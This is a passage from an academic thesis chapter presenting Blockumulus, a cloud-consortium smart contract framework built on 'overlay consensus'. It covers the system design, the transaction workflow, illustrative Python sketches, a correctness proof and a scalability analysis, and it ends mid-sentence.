unstructured permissionless P2P networks, where nodes can freely join and leave. To support such
flexibility, the blockchains use a gossip protocol for peer communication. In this protocol, the
peers are unaware of the current configuration of the network, so they achieve the network-wide
propagation of broadcast messages by forwarding them through a subset of known peers. This
incurs a significant message propagation latency and strict limits on the amount of data that can
be transferred [105, 298]. Moreover, to prevent Sybil attacks, in which an adversary creates a
large number of fake identities for gaining greater voting power, the PoW consensus algorithm
has been used by Bitcoin, Ethereum, and many other popular blockchains. The PoW consensus
involves heavy computation, resulting in enormous electricity consumption. As such, public
blockchains pay a very high price for the flexibility of the underlying P2P network. In this work,
we show that a smart contract can be used to facilitate a decentralized consensus in an overlay
smart contract environment built upon a centralized network of cloud providers, which drastically
reduces communication and computational overhead.
    Putting together the above observations, we develop the concept of overlay consensus, which
aims to deliver decentralization to smart contracts in a centralized cloud instead of random P2P
network nodes. As a result, a consortium of clouds can host a permissionless smart contract
environment and sell the access to it, but it cannot control the execution of these contracts or
interfere with the data stored by these contracts. To achieve this, we use a smart contract deployed
on a public blockchain to accrue periodic proofs of decentralization reported by the cloud consortium.
The smart contract is designed in a way that any attempt at foul play would inevitably generate a
publicly verifiable proof of the action of breaking the consensus protocol.

                  Table 6.1: Comparison of Blockumulus with state-of-the-art solutions.
                              General-purpose smart          Scalability improvement
        Solution                 contract support         TPS(a)    Storage    Compute
     Algorand [130]                     ✗                    ✓         ✗          ✗
     RapidChain [298]                   ✗                    ✓         ✗          ✗
     Lightning [232]                    ✗                    ✓         ✗          ✗
     Ekiden [98]                        ✓                    ✓         ✗          ✓
     Arbitrum [167]                     ✗                    ✗         ✗          ✓
     Jidar [103]                        ✗                    ✗         ✓          ✗
     Monoxide [279]                     ✗                    ✓         ✓          ✗
     Plasma [231]                       ✓                    ✗         ?          ✓
     OmniLedger [175]                   ✗                    ✓         ✗          ✗
     Blockumulus                        ✓                    ✓         ✓          ✓
     (a) Transaction throughput (transactions per second).
      In summary, we make the following contributions:
      • We introduce Blockumulus⁴⁹, a distributed framework for cloud contracts (bContracts⁵⁰)
         based on the novel concept of overlay consensus.
      • We implement the full Blockumulus stack along with a sample bContract, called FastMoney,
         for payment processing.
      • We evaluate our Blockumulus implementation and the FastMoney bContract to show that
         the framework delivers low transaction latency, high transaction throughput, and affordable
         operation cost.
6.2: Comparison with SOTA
Table 6.1 compares Blockumulus with the state-of-the-art (SOTA) solutions that aim to address the
scalability and performance limitations of blockchain. Although these solutions improve blockchain
scalability, they cannot simultaneously accommodate the growing demand for transaction throughput,
data storage, and heavy computation in applications such as cryptography, AI, and big data analytics.
In contrast, Blockumulus brings general-purpose smart contracts (i.e., smart contracts suitable
   ⁴⁹ The name Blockumulus is a portmanteau of the words “blockchain” and “cumulus”, a type of cloud with the
traditional puffy texture.
   ⁵⁰ bContract stands for “Blockumulus contract”.


                                Figure 6.1: Blockumulus overview.
for a variety of applications beyond cryptocurrency transactions) to the cloud, which improves
blockchain scalability in terms of transaction throughput, data storage, and computation simultane-
ously.
6.3: System Design
In this section, we introduce the Blockumulus framework and its operation protocol.
6.3.1: Blockumulus Overview
Blockumulus is a framework that builds a decentralized environment for executing smart contracts
upon a cloud consortium — a fixed set of M cloud nodes called cells, synchronized by the overlay
consensus. The overlay consensus is powered by a smart contract deployed on a third-party
public blockchain, with independent auditors running software for automated verification of the
Blockumulus workflow (see Fig. 6.1). Next, we introduce the major concepts of Blockumulus.
Blockumulus Code Execution Model: The code execution in Blockumulus is performed in de-
centralized Blockumulus smart contracts called bContracts, as shown in Fig. 6.2. The code of


                      Figure 6.2: Blockumulus state transition and data model.
bContracts is openly accessible, so that the execution of transactions could be verified by anyone.
The functions of bContracts are invoked through signed transactions arriving at the network, and
the code in bContracts can be executed by appropriate interpreters. bContracts can be written in
different programming languages, such as Python or JavaScript.
Blockumulus Data Model: All data in Blockumulus is openly accessible and managed via cus-
tom models implemented in the deployed bContracts. In order to store data as part of Blockumulus,
each bContract must implement two interfaces: data fingerprinting and data cloning. Data finger-
printing is a function that produces a fingerprint of the bContract’s current state or previously saved
state. The data cloning function asks the contract to temporarily save its current state of data for sub-
sequent fingerprinting. Blockumulus then combines all the fingerprints reported by the bContracts
into a single hash called the data snapshot fingerprint.
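The two interfaces described above can be illustrated with a minimal Python sketch. It is not the Blockumulus implementation: the class CounterContract, the function snapshot_fingerprint, the JSON serialization, and the use of SHA-256 are all assumptions made for illustration only.

```python
import hashlib
import json


class CounterContract:
    """Toy bContract (hypothetical) whose state is a dict of counters."""

    def __init__(self):
        self.state = {}
        self.saved = None  # state captured by the last clone() call

    def increment(self, key):
        self.state[key] = self.state.get(key, 0) + 1

    def clone(self):
        # Data cloning: temporarily save the current state for fingerprinting.
        self.saved = json.dumps(self.state, sort_keys=True)

    def fingerprint(self, saved=False):
        # Data fingerprinting: hash of the current or the previously saved state.
        if saved:
            if self.saved is None:
                raise ValueError("clone() has not been called yet")
            data = self.saved
        else:
            data = json.dumps(self.state, sort_keys=True)
        return hashlib.sha256(data.encode()).hexdigest()


def snapshot_fingerprint(contracts):
    """Combine per-contract fingerprints into one snapshot fingerprint.

    `contracts` maps a contract name to a contract object. Names are sorted
    so that every cell hashes the fingerprints in the same order.
    """
    h = hashlib.sha256()
    for name in sorted(contracts):
        h.update(name.encode())
        h.update(bytes.fromhex(contracts[name].fingerprint(saved=True)))
    return h.hexdigest()
```

In this sketch, transactions executed after clone() change the current fingerprint but not the saved one, so the snapshot fingerprint stays stable while it is being reported.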
Overlay Consensus: The core idea of Blockumulus overlay consensus is to periodically report the
hashes of data snapshots to a dedicated smart contract deployed on a public blockchain, as shown
in Fig. 6.3. Once the report is submitted, it cannot be altered. Subsequently, if the report does not
match the publicly available and independently verifiable snapshot, the cell cannot be trusted. In
essence, the Ethereum smart contract serves as an online barometer of liveness and integrity of the
Blockumulus deployment.


    Blockumulus overlay consensus differs from the traditional Nakamoto consensus observed in
popular public blockchains in two major ways. First, Blockumulus consensus uses a correctness
check instead of voting: all incoming transactions are recorded, and there is only one correct
way to execute them, which rules out the existence of two conflicting transactions in different
cells. Second, all transactions are executed immediately, during the open session with the
client, with a pre-defined decision deadline. As a result, a consensus partition (called a fork)
is impossible in Blockumulus. Unlike in a distributed database, which stipulates identical query
execution in all tables, Blockumulus provides autonomous but distinct execution environments for
each individual bContract. The contracts with mismatching fingerprints can be excluded from the
consensus, and timely fingerprint reports can be guaranteed even if some contracts are unable to
establish consensus within their respective contexts. The goal of each bContract is to assure that
a transaction is executed identically across all the cells. To enforce this, after each transaction,
the called bContract produces a fingerprint of its current data. If the fingerprints do not match,
the bContract is temporarily excluded from the snapshot. As a result, each transaction entails an
identical state transition of each cell in Blockumulus. If a cell becomes unresponsive or fails the
verification, it is excluded from the consensus until the next report cycle.
Report Timing: Prior to deployment, the cloud consortium determines the system invariants that
cannot be changed during the lifetime of the system. One of these invariants is the snapshot report
period, denoted $\lambda$, which is measured in seconds. In Blockumulus, the report deadlines are all
timestamps divisible by $\lambda$. Therefore, the last report deadline can be calculated as
$t_d = t_c - (t_c \bmod \lambda)$, where $t_c$ is the current timestamp. Thus, the upcoming report
deadline is calculated as $t_{next} = \lambda + t_c - (t_c \bmod \lambda)$. Every data snapshot, denoted
$S_i$, has a serial number $i$, which is called the report cycle, represented as
$i = \frac{t_d - t_0}{\lambda}$, where $t_0$ is the deadline of the very first snapshot in the Blockumulus
deployment. Subsequently, the Blockumulus protocol requires that each cell reports the snapshot
$S_i$ by the end of cycle $i + 1$ in order to be treated as valid during the cycle $i + 2$.
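Since report deadlines are exactly the timestamps divisible by the report period, the timing quantities reduce to integer arithmetic. The following Python sketch is illustrative only; the function names and the sample values (a 600-second period and the timestamps) are assumptions, not parameters of the actual deployment.

```python
def last_deadline(t_c, lam):
    """Most recent timestamp not later than t_c that is divisible by lam."""
    return t_c - (t_c % lam)


def next_deadline(t_c, lam):
    """First report deadline strictly after the last one."""
    return last_deadline(t_c, lam) + lam


def report_cycle(t_c, lam, t_0):
    """Serial number of the current snapshot, counted from the first deadline t_0."""
    return (last_deadline(t_c, lam) - t_0) // lam


# Hypothetical values: a 10-minute report period and a first deadline at 1,200,000.
lam, t_0, t_c = 600, 1_200_000, 1_203_725
print(last_deadline(t_c, lam))      # 1203600
print(next_deadline(t_c, lam))      # 1204200
print(report_cycle(t_c, lam, t_0))  # 6
```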


                    Figure 6.3: Reporting of current cell state to the smart contract.
6.3.2: Blockumulus Components
Next, we introduce the major components of Blockumulus: consortium of cloud cells, decentral-
ized Blockumulus smart contracts (bContracts), clients, Ethereum smart contract, and independent
auditors.
Cloud Consortium: The cloud consortium is a pre-defined set of Blockumulus cells. The number
of cells should be sufficient to guarantee the availability of the system, but it should remain
small (i.e., 10 or fewer) to avoid performance degradation. Unlike peers in a blockchain, multiple
cells in Blockumulus are used to achieve accessibility and fault tolerance rather than consensus,
which will be detailed in Section 6.4. Moreover, since clouds allow vertical scalability (i.e.,
adding resources to existing entities), a large number of cells (horizontal scalability) is not needed
to improve performance either. The size of the consortium and the set of identities of the


participating cells are the invariants that must be decided at the time of deployment.
Blockumulus Cell: A Blockumulus cell is a network node on the cloud, which is sufficient for
participating in Blockumulus consensus. A cell can be represented by a virtual machine, physical
dedicated server, or a compute cluster — whichever meets the demands of the system.
bContracts: Blockumulus smart contracts (bContracts) are decentralized programs deployed on
Blockumulus, whose functionality is similar to that of smart contracts in Ethereum or chaincode in
Hyperledger Fabric. There are two types of bContracts: system bContracts and community bContracts.
The system bContracts are pre-deployed in Blockumulus, and they cannot be removed. The com-
munity bContracts are developed and deployed by clients.
Blockumulus Clients: A Blockumulus client is a person or software that interacts with a deployed
bContract. Blockumulus is a permissionless environment for clients, which means that clients do
not have to register a Blockumulus account. However, akin to the ISP model for Internet access,
a client should have a subscription to Blockumulus through one of the cells. The subscription,
however, does not give the cell any control over the client's use of Blockumulus. The purpose of the
subscription is to charge for the data transferred or for the time period during which the
subscription is active. This contrasts with the transaction fee collection observed in public
blockchains. As a result, Blockumulus offers flexibility that allows cells to establish their own
pricing policies to compete for customers.
Ethereum Smart Contract: Each Blockumulus deployment has a smart contract on the Ethereum
blockchain, which stores hashes of the reported snapshots. To avoid retrospective modification,
repeated reporting for the same timestamp is prohibited by the logic of the smart contract.
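The write-once reporting rule can be modeled in a few lines of Python. This is a model of the contract logic only, not the Solidity code of the deployed contract; the class ReportRegistry, its method names, and the sample addresses are hypothetical.

```python
class ReportRegistry:
    """Python model (hypothetical) of the snapshot report storage."""

    def __init__(self, cells):
        self.cells = frozenset(cells)  # cell addresses, fixed at deployment
        self.reports = {}              # (cell, deadline) -> fingerprint

    def report(self, cell, deadline, fingerprint):
        if cell not in self.cells:
            raise PermissionError("only consortium cells may report")
        if (cell, deadline) in self.reports:
            # Repeated reporting for the same timestamp is prohibited.
            raise ValueError("report already submitted for this deadline")
        self.reports[(cell, deadline)] = fingerprint

    def get(self, cell, deadline):
        return self.reports.get((cell, deadline))
```

Because an entry can be written only once, a cell that later alters its snapshot cannot make the stored fingerprint match the altered data.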
Blockumulus Auditors: Akin to a public blockchain, Blockumulus is an open-data system with
transparent execution, i.e., Blockumulus data is available to everyone, and everyone can
independently trace the state transition between a given pair of subsequent data snapshots. Auditors
are voluntary permissionless participants that run software to oversee the integrity of the
Blockumulus deployment. The community auditing model, which demonstrated its efficiency in public
blockchains, is also employed in Blockumulus. Auditors can be paid participants, community
enthusiasts, security bounty hunters, or academic researchers. Moreover, cells in the consortium can perform


                               Figure 6.4: Blockumulus audit procedure.
cross-audit. The process of auditing requires only a server and the auditing software that is run-
ning on this server to monitor the integrity of Blockumulus. Fig. 6.4 shows the procedure of the
Blockumulus audit. The auditing software performs two major tasks: snapshot succession audit
and data integrity audit. The snapshot succession audit is the verification that all the transactions
processed by all bContracts between two reports indeed entail a state transition from one data snap-
shot into another. The data integrity check verifies that: a) the snapshot fingerprints have been
reported to the smart contract on time; and b) the fingerprints in reports match the actual data in
the cells.
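The two audit tasks can be sketched in Python as follows. The sketch assumes a toy balance-transfer state model and SHA-256 over JSON as the fingerprint; the function names and data layout are hypothetical and do not reflect the actual auditing software.

```python
import hashlib
import json


def fingerprint(state):
    """Hash of a JSON-serializable state (SHA-256 is an assumption)."""
    return hashlib.sha256(json.dumps(state, sort_keys=True).encode()).hexdigest()


def apply_transfer(state, tx):
    """Toy state transition: move tx['amount'] from tx['from'] to tx['to']."""
    if state.get(tx["from"], 0) < tx["amount"]:
        raise ValueError("insufficient balance")
    new_state = dict(state)
    new_state[tx["from"]] -= tx["amount"]
    new_state[tx["to"]] = new_state.get(tx["to"], 0) + tx["amount"]
    return new_state


def succession_audit(prev_state, transactions, next_state, apply_tx=apply_transfer):
    """Replay the transactions on the previous snapshot and compare the result."""
    state = prev_state
    for tx in transactions:
        state = apply_tx(state, tx)
    return fingerprint(state) == fingerprint(next_state)


def integrity_audit(snapshot_state, reported_fingerprint, reported_at, deadline):
    """Check that the report was on time and matches the actual snapshot data."""
    on_time = reported_at <= deadline
    return on_time and fingerprint(snapshot_state) == reported_fingerprint
```

An auditor would run both checks for every pair of subsequent snapshots and for every cell, flagging a cell as soon as either check fails.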
6.3.3: Blockumulus Cell Architecture
In this section, we take a closer look at the architecture of a cell, which is shown in Fig. 6.5.
Blockumulus Core: Blockumulus cell Core is responsible for networking, cryptography, synchro-
nization, protocol, process and thread management, signature and authenticity verification, trans-
action parsing, data encoding and decoding, and communication with the smart contract.
Uniform RESTful Interface: Blockumulus assumes six vectors of communication: client-cell,
cell-cell, auditor-cell, cell-blockchain, auditor-blockchain, and client-auditor. The client-cell, cell-
cell, and auditor-cell communications have a uniform RESTful interface. Specifically, each request


                           Figure 6.5: Blockumulus components and bContracts.
is either a GET or a POST HTTP request with the body formally represented as the following set:
    $$M = \{P = \langle A_s, A_r, O, \eta, \tau, t, D \rangle, \mathrm{Sig}_s(P)\},$$
where $P$ is the payload of the message, and $\mathrm{Sig}_s$ is the ECDSA signature calculated with the
private key of the sender. The tuple $P$ has the following components: $A_s$ is the public address of
the sender, $A_r$ is the public address of the intended recipient, $O$ is the operation code, $\eta$ is a
random nonce used as a message ID, $\tau$ is the ID of the message that $M$ is replying to (if
applicable), $t$ is the current timestamp, and $D$ is the data, whose format is determined by $O$.
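The message structure can be sketched in Python as a payload plus a signature over its canonical encoding. Two points are assumptions of this sketch rather than facts about Blockumulus: the JSON encoding of the payload, and the use of HMAC-SHA256 as a stand-in for the ECDSA signature so that the example needs only the standard library. All class and function names are hypothetical.

```python
import hashlib
import hmac
import json
import secrets
import time
from dataclasses import asdict, dataclass, field
from typing import Optional


@dataclass
class Payload:
    sender: str                     # A_s, public address of the sender
    recipient: str                  # A_r, public address of the recipient
    opcode: str                     # O, operation code
    data: dict                      # D, format determined by the opcode
    reply_to: Optional[str] = None  # tau, ID of the message being answered
    nonce: str = field(default_factory=lambda: secrets.token_hex(16))  # eta
    timestamp: int = field(default_factory=lambda: int(time.time()))   # t

    def encode(self) -> bytes:
        # Canonical serialization so signer and verifier hash the same bytes.
        return json.dumps(asdict(self), sort_keys=True).encode()


def sign(payload: Payload, key: bytes) -> str:
    # Stand-in for Sig_s(P): HMAC-SHA256, NOT the ECDSA scheme named in the text.
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def make_message(payload: Payload, key: bytes) -> dict:
    return {"payload": asdict(payload), "signature": sign(payload, key)}


def verify(message: dict, key: bytes) -> bool:
    payload = Payload(**message["payload"])
    return hmac.compare_digest(sign(payload, key), message["signature"])
```

With real ECDSA, verification would recover or check the signer's public address against the sender field instead of sharing a secret key; the surrounding structure would stay the same.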
Keys: Each cell uses an Ethereum account to represent itself within Blockumulus. The set of public
addresses⁵¹ of Blockumulus cells is fixed for each deployment and is hard-coded in the Ethereum
smart contract.
System Invariants: Some parameters of a Blockumulus deployment that remain constant for a
   ⁵¹ In Ethereum, the public address of an account is the rightmost 160 bits of the Keccak-256 hash of the
account’s public key.


lifetime are called the system invariants. Examples of system invariants are the unique deployment
ID, the identities of the cells, the reporting period $\lambda$, and the initial timestamp $t_0$. However,
the IP addresses of cells are not among the invariants, which allows cells to change their location or
network configuration; we assume that these settings are exchanged between cells.
System bContracts: The system bContracts are pre-implemented as part of Blockumulus, and
they cannot be removed. These bContracts deliver essential functionality to the system, and their
number can grow as the Blockumulus framework evolves. The current version of Blockumulus
includes two system bContracts: the community bContract deployer and the content-addressable
storage (CAS). The community bContract deployer serves as an interface for developers to add their
community bContracts to Blockumulus. The CAS contract has two major functions: a) it allows large
files to be stored outside of the data models of community bContracts, thereby significantly
improving the performance of fingerprinting and cloning; and b) it establishes a secure
communication channel between bContracts, which are otherwise autonomous and isolated.
Community bContracts: Community bContracts are deployed by users of Blockumulus. The
cells have no power to modify, censor, or control these contracts. The deployer of a community
bContract can specify the ownership and other parameters of the contract, including the ability to
destroy it.
bContract Interface: In order to create a bContract, the developer should implement a standard
bContract interface, which includes smart contract data model, data fingerprinting, and snapshot
cloning. Then, the developer writes the bContract code for the interpreter specified in the configu-
ration.
6.3.4: Blockumulus Protocol
Data Snapshots and Fingerprinting: Blockumulus data is stored in bContracts according to their
respective data models. For example, one bContract can store data in binary files, while others may
use SQLite. To prevent operations with large data instances, bContracts can upload data blobs to
Blockumulus CAS, and refer to these blobs via their hashes. Blockumulus performs CAS reference


                                  Figure 6.6: Blockumulus lifecycle.
counting, purging CAS entries only when their reference counters reach zero.
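A reference-counted content-addressable store can be sketched in Python as follows. The class and method names are hypothetical, and SHA-256 is assumed as the content hash; the actual CAS bContract may differ.

```python
import hashlib


class ContentAddressableStore:
    """Minimal reference-counted CAS (illustrative sketch)."""

    def __init__(self):
        self.blobs = {}  # hash -> blob
        self.refs = {}   # hash -> number of references held by bContracts

    def put(self, blob: bytes) -> str:
        key = hashlib.sha256(blob).hexdigest()
        if key not in self.blobs:
            self.blobs[key] = blob
            self.refs[key] = 0
        self.refs[key] += 1  # identical content is stored once, counted per use
        return key

    def get(self, key: str) -> bytes:
        return self.blobs[key]

    def release(self, key: str) -> None:
        self.refs[key] -= 1
        if self.refs[key] == 0:
            # Purge the entry only when no bContract refers to it anymore.
            del self.blobs[key]
            del self.refs[key]
```

A bContract then keeps only the returned hash in its own data model, which keeps fingerprinting and cloning cheap regardless of the blob size.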
Operation Lifecycle: Fig. 6.6 shows the lifecycle of Blockumulus, which alternates between
two stages: the main stage and the report stage. In the main stage, which is longer than the report
stage, Blockumulus actively accepts and processes incoming transactions that shape the current data
snapshot. During the main stage, auditors download the previous data snapshot for review and storage.
In the report stage, Blockumulus accepts transactions, but instead of executing them, it queues
them in a buffer. Once the current snapshot is fingerprinted, Blockumulus resumes executing the
queued and incoming transactions, and the cell saves the fingerprint in the smart contract. Execution
does not wait for this submission to complete, because the execution inhibition is needed only for
calculating the fingerprint, not for the smart contract submission.
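The alternation between the two stages can be sketched as a small Python state machine. The class CellLifecycle and its method names are hypothetical; the sketch only shows the queuing behavior and omits fingerprint calculation and networking.

```python
from collections import deque


class CellLifecycle:
    """Toy model of the main stage and the report stage of a cell."""

    def __init__(self, execute):
        self.execute = execute  # callable that applies one transaction
        self.reporting = False
        self.queue = deque()

    def submit(self, tx):
        if self.reporting:
            self.queue.append(tx)  # report stage: accept, but do not execute
        else:
            self.execute(tx)       # main stage: execute immediately

    def begin_report(self):
        # The snapshot is being fingerprinted, so its data must not change.
        self.reporting = True

    def end_report(self):
        # Fingerprint is ready: resume execution, draining the buffer in order.
        self.reporting = False
        while self.queue:
            self.execute(self.queue.popleft())
```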
Transactions: Fig. 6.7 shows a general overview of a Blockumulus transaction. The transaction
begins with a client creating a transaction message M, which is signed and sent to the
Blockumulus cell with which the client has an access subscription, called the service cell. The
service cell first authenticates the transaction by confirming that the transaction message is signed
by the user with the same identity (public address) as the one found in the transaction message.
Then, the service cell forwards the transaction to all the cells in the consortium. After that, the cells
of the consortium verify and execute the transaction and send a signed confirmation back to the


Figure 6.7: Blockumulus transaction workflow. (1) The client creates a transaction and commits it to
the Blockumulus cell with which they have a Blockumulus access subscription; (2) the service
cell verifies the authenticity of the transaction, and forwards it to all the other cells in the consortium;
(3) the cells of the consortium process the transaction and send a signed confirmation back to the
service cell within a strict deadline; (4) the service cell executes the transaction, serializes the
confirmations into an aggregated receipt, and sends it to the client as a reply to the initial commit
request.
service cell within a pre-determined short time frame. If the forwarded transaction is not processed
by all cells by the established deadline, the transaction reverts. If a cell misses the deadline more
often than a pre-determined threshold, it is temporarily excluded from the consensus upon mutual
agreement of the other cells. Finally, the service cell verifies the fingerprints of the resulting
data snapshots reported by the other cells, and executes the transaction itself. If the result of
the execution matches the fingerprints reported by the other cells, the service cell serializes the
confirmations into an aggregated receipt, and sends it to the client as a reply to the initial commit
request, which constitutes the transaction confirmation event with a multi-signature cryptographic
proof.
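The control flow of a transaction at the service cell can be sketched in Python. This is a sequential simulation under several assumptions: cells are modeled as plain callables that return a fingerprint, a signature string, and the elapsed time; forwarding is not parallel; and the "rejected" outcome on a fingerprint mismatch is a choice of this sketch. The names process_transaction and make_cell are hypothetical.

```python
def make_cell(name, fingerprint, elapsed):
    """Hypothetical test double: a cell that answers after `elapsed` seconds."""
    def cell(tx):
        return fingerprint, f"sig:{name}:{tx}", elapsed
    return cell


def process_transaction(tx, service_cell, other_cells, deadline):
    """Forward tx to the other cells, then execute locally and build a receipt."""
    confirmations = []
    for cell in other_cells:
        fingerprint, signature, elapsed = cell(tx)
        if elapsed > deadline:
            # A cell missed the deadline, so the transaction reverts.
            return {"status": "reverted", "reason": "deadline missed"}
        confirmations.append((fingerprint, signature))

    own_fingerprint, own_signature, _ = service_cell(tx)
    if any(fp != own_fingerprint for fp, _ in confirmations):
        # Assumption of this sketch: a mismatch yields no receipt.
        return {"status": "rejected", "reason": "fingerprint mismatch"}

    # Aggregated receipt: one fingerprint plus the signatures of all cells.
    signatures = [own_signature] + [sig for _, sig in confirmations]
    return {"status": "confirmed", "fingerprint": own_fingerprint,
            "signatures": signatures}
```

For example, with a service cell and two other cells that all return the same fingerprint within the deadline, the receipt carries three signatures, which plays the role of the multi-signature proof returned to the client.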
Incentive for Cooperation: Here, the incentive for cooperation is discussed from the perspective
of a P2P network. Unlike public blockchain consensus (e.g., Nakamoto consensus), Blockumulus
is designed to encourage cooperation and make cheating unprofitable. The combination of
synchronous execution, fixed cell topology, open data, transparent execution, and a payment model
separated from consensus creates an arrangement in which cells have no incentive to cheat. Moreover,
each cell benefits from fast and successful execution of transactions by all other cells in the
system. The following theorem confirms that competition for voting power, typical for blockchains,
is not pertinent to Blockumulus.
Theorem 1: The minimum required number of valid cells in Blockumulus overlay consensus is the
same for all M ≥ 2.
Proof: As per the design of Blockumulus, the auditor software verifies that the deployment has at least
one cell $i$ that maintains the succession of reported snapshots $S_{i,j}$ and the correctness of the
corresponding smart contract reports $R_{i,j}$, i.e.:
    $$\exists\, 1 \le i \le M \;\; \forall\, 1 \le j \le \frac{t_d - t_0}{\lambda} : \; S_{i,j} \xrightarrow{\text{succession}} S_{i,j+1} \,\wedge\, H(S_{i,j}) = R_{i,j}, \qquad (6.1)$$
where $H$ is the hash function used for fingerprinting in Blockumulus, and $t_d$ is the last report
deadline. Suppose that $M = 2$ and one cell is valid, while the other cell may or may not be
compromised or cheating. In this case, formula (6.1) evaluates to “true”, because either Cell 1 is
valid, or Cell 2 is valid, or both of them are valid. Now, suppose that $M = Q$ ($Q > 2$), and one cell
is valid, while all other cells may or may not be compromised or cheating. In this case, formula
(6.1) again evaluates to “true”, because there is a cell with an index in the range $[1, Q]$, which
maintains the succession of snapshots and the correctness of the fingerprint reports. Therefore, the
minimal number of valid cells required for the overlay consensus is always 1. ■
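The predicate used in the proof can be evaluated mechanically, which makes the independence from M easy to see. The Python sketch below is a simplified illustration: snapshots are byte strings, SHA-256 stands in for H, and the succession relation is passed in as a hypothetical callable.

```python
import hashlib


def H(snapshot: bytes) -> str:
    """Fingerprint function (SHA-256 is an assumption of this sketch)."""
    return hashlib.sha256(snapshot).hexdigest()


def cell_is_valid(snapshots, reports, succeeds):
    """True if every report matches its snapshot and succession is maintained."""
    if len(snapshots) != len(reports):
        return False
    hashes_ok = all(H(s) == r for s, r in zip(snapshots, reports))
    succession_ok = all(succeeds(a, b) for a, b in zip(snapshots, snapshots[1:]))
    return hashes_ok and succession_ok


def consensus_holds(cells, succeeds):
    """The existential check of the proof: at least one valid cell, for any M."""
    return any(cell_is_valid(s, r, succeeds) for s, r in cells)
```

Adding more invalid cells to the list never changes the outcome as long as one valid cell remains, which mirrors the argument of the proof.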
6.4: Scalability Analysis
In this section, we formally explore the scalability of Blockumulus through an asymptotic com-
plexity analysis. All the assumptions in this section follow the real implementation of the system


described later in Section 6.6.
     Here, we assume that K clients submit N successful transactions to a Blockumulus deployment
with M cells. We use the symbol c to denote a constant value that does not grow as the system scales.
Number of Cells: Unlike blockchain, in which an increase in the number of nodes benefits
decentralization, the Blockumulus overlay consensus requires only one valid cell to sustain normal
operation, including prevention of conflicting transactions, such as double spending. As per Theorem 1,
proven in Section 6.3, adding more cells does not enhance the decentralization of a Blockumulus
deployment. Thus, we neither require the number of cells M to be scalable, nor do we assume its
scalability. The two reasons for using multiple cells in Blockumulus are to enhance the availability of
the system through replication and to increase the diversity of Blockumulus access providers.
6.4.1: Transaction Latency
Transaction latency is the total delay experienced by the client from the initiation of a transaction
until the confirmation of its completion. The cumulative transaction delay in the system, denoted
$L_{delay}$, can be expressed as
    $$L_{delay} = N \cdot \left(D_1 + \max_{i=2}^{M}(D_i + D_i^*) + D_c\right),$$
where $D_1$ is the delay of sending a transaction to the service cell, $D_i$ is the delay in forwarding
the transaction to cell $i$, $D_i^*$ is the delay of the response from cell $i$ to the service cell, and
$D_c$ is the delay of sending the response to the client. We also assume that $D_i + D_i^* < \delta$ for
all $i > 1$, where $\delta$ is the maximum transaction forwarding delay. Each of the $N$ transactions
begins with the client sending it to the service cell, which simultaneously forwards the transaction
to all the other cells, followed by an immediate parallel response from these cells to the service
cell. Then, it finishes by sending the aggregate response to the client from the service cell. Now,
since $D_1$, $\delta$, and $M$ do not grow with an increased number of transactions, the transaction
latency complexity can be presented as $L_{delay} = N \cdot (c + c \cdot c + c) = O(N)$. Therefore, the
cumulative transaction latency in Blockumulus grows linearly with the number of transactions.
Section 6.6.3 further shows that the transaction latency remains low even when the cells are
deployed on low-tier cloud servers with an extreme transaction load.
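The latency expression can be evaluated directly. The Python sketch below uses hypothetical delays in milliseconds; the function name and the sample values are illustrative assumptions, not measurements.

```python
def cumulative_latency(n, d_1, cell_delays, d_c):
    """Cumulative delay of n transactions.

    d_1: delay of sending a transaction to the service cell.
    cell_delays: list of (D_i, D_i*) pairs for the cells i = 2..M.
    d_c: delay of sending the response back to the client.
    """
    # Forwarding is parallel, so only the slowest round trip counts.
    slowest_round_trip = max(d + d_star for d, d_star in cell_delays)
    return n * (d_1 + slowest_round_trip + d_c)


# Hypothetical delays in milliseconds for a consortium of M = 4 cells.
delays = [(30, 25), (40, 35), (10, 10)]
print(cumulative_latency(1, 20, delays, 20))     # 115
print(cumulative_latency(1000, 20, delays, 20))  # 115000
```

The per-transaction term stays at 115 ms regardless of how many transactions are submitted, which is why the cumulative delay is linear in N.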


6.4.2: Communication Overhead
Transaction communication overhead is the total amount of data transferred within Blockumulus in
the course of $N$ transactions. The communication overhead $L_{data}$ of $N$ Blockumulus transactions
can be expressed as follows:
    $$L_{data} = N \cdot \Big[H_c + P_c + (M - 1) \cdot (H_1 + H_c + P_c) + \sum_{i=2}^{M}(H_i + P_i) + \sum_{i=1}^{M}(H_i + P_i)\Big], \qquad (6.2)$$
where $H_c$ is the header sent by a client, $P_c$ is the payload sent by a client, $H_i$ is the header
sent by a cell $i$, and $P_i$ is the payload sent by the cell $i$. Since headers and payloads of messages
do not become bigger with more transactions, and the number of cells remains constant, Eq. (6.2) can
be reduced to $L_{data} = N \cdot [2c + c \cdot 3c + c \cdot 2c + c \cdot 2c] = O(N)$. Therefore, as the
number of transactions grows, the communication overhead also experiences a linear increase. In
Section 6.6, we show that this complexity is manageable in practice and does not lead to bottlenecks
even under an extreme transaction load.
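Eq. (6.2) can be evaluated term by term. In the Python sketch below, the names given to the four terms (client request, forwarding, confirmations, receipt) are an interpretation made for readability, and the byte sizes are hypothetical.

```python
def communication_overhead(n, h_c, p_c, headers, payloads):
    """Evaluate Eq. (6.2) for n transactions.

    headers[k] and payloads[k] are H_i and P_i of cell i = k + 1, so index 0
    belongs to the service cell (cell 1). The term names are interpretive.
    """
    m = len(headers)
    client_request = h_c + p_c
    forwarding = (m - 1) * (headers[0] + h_c + p_c)
    confirmations = sum(h + p for h, p in zip(headers[1:], payloads[1:]))
    receipt = sum(h + p for h, p in zip(headers, payloads))
    return n * (client_request + forwarding + confirmations + receipt)


# Hypothetical sizes in bytes for M = 3 cells.
print(communication_overhead(2, 10, 100, [10, 10, 10], [50, 50, 50]))  # 1300
```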
6.4.3: Data Storage
We assume that each transaction in Blockumulus leaves a data footprint $U_i$, which is replicated
across participating cells, and also appears in three snapshots⁵²: the snapshot currently being built
and the two previous snapshots left for auditing. The data storage can be written as
$L_{storage} = 3 \cdot M \cdot \sum_{i=1}^{N} U_i$. Since the number of cells $M$ and the size of each
stored data item $U_i$ do not grow with the increasing number of transactions and users, the following
reduction takes place: $L_{storage} = 3 \cdot c \cdot N \cdot c = O(N)$. Therefore, the complexity of the
stored data is linear with respect to the number of transactions.
   ⁵² Blockumulus uses the CAS subsystem to prevent unnecessary replication of the same data across several snapshots.
However, since our analysis pursues the upper bound complexity, we assume 100% replication of the data.


6.4.4: Computation
In our Blockumulus compute analysis, we take into consideration the processing performed both
by cells and by auditors. We further assume that the number of auditors is linearly proportional
to the number of users $K$, i.e., a certain percentage of users serve as auditors. Then, the cumulative
